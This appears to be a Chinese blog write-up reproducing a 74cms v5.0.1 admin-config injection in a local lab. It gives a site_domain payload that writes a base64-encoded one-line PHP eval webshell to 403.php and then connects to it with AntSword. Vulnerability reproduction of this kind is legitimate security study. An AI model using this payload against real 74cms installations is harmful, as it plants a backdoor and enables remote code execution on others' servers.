74cms v5.0.1 漏洞复现

一、环境搭建

这里用到PHPstudy+VMware+Windows7(IP:192.168.253.131)进行环境搭建,且是在本地进行测试。
1.首先在官网下载74cms v5.0.1版本的安装包:http://www.74cms.com/download/index.html
请添加图片描述
2.将下载好的压缩包文件解压并放至PHPstudy的WWW目录下。
请添加图片描述
3.打开 192.168.253.131/74cms_Home_Setup_v5.0.1/upload/install.php 并系统安装。
请添加图片描述
请添加图片描述
请添加图片描述
请添加图片描述

OK,系统安装完成。

二、漏洞利用

1.登录后台以后,点击保存网站配置的同时用burpsuite抓包。
请添加图片描述
请添加图片描述
2.修改site_domain的内容,这里对内容进行base64加密:site_domain=‘,file_put_contents(‘403.php’,base64_decode(‘PD9waHAgZXZhbCgmX1BPU1QoJzEyMycpKTs/Pg==’)),’
请添加图片描述
3.这里等号需要URL编码

请添加图片描述
4.再次访问:http://192.168.253.131/74cms_Home_Setup_v5.0.1/upload/Application/Common/Conf/url.php,使恶意语句成功执行。
请添加图片描述
5.一句话木马已被写入:
在这里插入图片描述

6.使用蚁剑连接:http://192.168.253.131/74cms_Home_Setup_v5.0.1/upload/Application/Common/Conf/403.php
在这里插入图片描述
OK,连接成功,over。

  • 1
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 3
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

成都残疾人驾校彭老师

你的 打赏将是我的进步的一大动

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值